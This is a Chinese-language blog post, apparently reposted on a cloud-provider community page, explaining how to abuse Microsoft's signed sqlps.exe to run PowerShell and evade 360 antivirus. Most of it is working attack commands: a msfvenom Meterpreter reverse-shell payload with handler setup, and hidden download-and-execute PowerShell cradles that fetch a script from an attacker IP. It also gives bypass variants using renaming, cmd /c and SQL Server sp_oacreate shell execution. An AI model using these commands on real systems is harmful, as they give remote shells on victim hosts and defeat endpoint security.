sqlps.exe白名单的利用(过S60!)

本文涉及的产品
云数据库 RDS SQL Server,基础系列 2核4GB
RDS SQL Server Serverless,2-4RCU 50GB 3个月
推荐场景:
简介: sqlps.exe白名单的利用(过S60!)

0x01 sqlps.exe简介

sqlps.exe是SQL Server附带的一个具有Microsoft签名的二进制文件,用于加载SQL Server cmdlet,Microsoft Visual C#开发,可用ILSpy反编译查看源代码。


Microsoft SQL Server\100和110是Powershell v2,120和130是Powershell v4。2016中已由SQLToolsPS.exe替换,但出于兼容性原因将包含在安装中。

    C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
    C:\Program Files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
    C:\Program Files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe
    C:\Program Files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
    C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\sqlps.exe
    C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\sqlps.exe


    0x02 MSF监听并执行

    使用sqlps.exe执行360.ps1后会结束掉当前这个cmd.exe命令提示符,可能要延迟几秒MSF才接收到会话信息。

      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f psh-reflection > /var/www/html/360.ps1
      msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
      msf5 exploit(multi/handler) > set lhost 192.168.1.120
      msf5 exploit(multi/handler) > set lport 443
      msf5 exploit(multi/handler) > exploit


      sqlps执行上线:

        SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/360.ps1'))"


        0x03 绕过360防护执行

        众所周知360和火绒对powershell.exe进程的调用监控的非常严, sqlps.exe也有可能已经被360拦截了,如下图。


        已被拦截:

          powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/360.ps1'))"
          SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/360.ps1'))"
          declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe'


          但我们还是可以尝试使用加壳、反编译或者重命名和cmd /c等方式来绕过sqlps.exe的执行

          绕过方式:

            SQLPS1 -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/360.ps1'))"
            cmd /c SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/360.ps1'))"
            declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\ProgramData\SQLPS.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://192.168.1.120/360.ps1''))"'


            0x04 注意事项

            实战中建议根据目标主机实际环境提取相对应版本的sqlps.exe,如单独提取出来的sqlps.exe在执行时可能会出现缺少依赖项等问题,常见的有以下两种报错。

            已测试的系统和sqlps.exe见下表,测试记录见下图。


            0x05 参考链接

            https://mp.weixin.qq.com/s/XkleeVDz80WZy4NZqXhEfA

            https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/

            相关实践学习
            使用SQL语句管理索引
            本次实验主要介绍如何在RDS-SQLServer数据库中,使用SQL语句管理索引。
            SQL Server on Linux入门教程
            SQL Server数据库一直只提供Windows下的版本。2016年微软宣布推出可运行在Linux系统下的SQL Server数据库,该版本目前还是早期预览版本。本课程主要介绍SQLServer On Linux的基本知识。 相关的阿里云产品:云数据库RDS SQL Server版 RDS SQL Server不仅拥有高可用架构和任意时间点的数据恢复功能,强力支撑各种企业应用,同时也包含了微软的License费用,减少额外支出。 了解产品详情: https://www.aliyun.com/product/rds/sqlserver
            相关文章
            |
            7月前
            |
            网络协议 Linux Docker
            linux白名单设置
            linux白名单设置
            |
            Shell Perl
            获取slb日志里ip地址的shell脚本
            获取slb日志里ip地址的shell脚本
            96 1
            |
            移动开发 C# Python
            fsi.exe和cdb.exe白名单的利用
            fsi.exe和cdb.exe白名单的利用
            102 0
            远程桌面端口修改.bat
            远程桌面端口修改.bat
            170 0
            |
            Shell Linux Perl
            Linux获取外网IP地址shell脚本
            版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/catoop/article/details/81736239 基于Linux系统的获取外网IP地址的shell脚本,脚本内容如下: getIp.
            3972 0
            |
            人工智能 Linux Shell
            linux 批量添加IP白名单脚本
            用数组将各个IP通过循环打印的方式生成多条命名
            1310 0
            |
            网络协议 Windows
            使用BAT设置Windows系统的IP地址
            系统环境使用windows10,版本1809(内部版本17763.379)
            1701 0
            |
            Linux 数据安全/隐私保护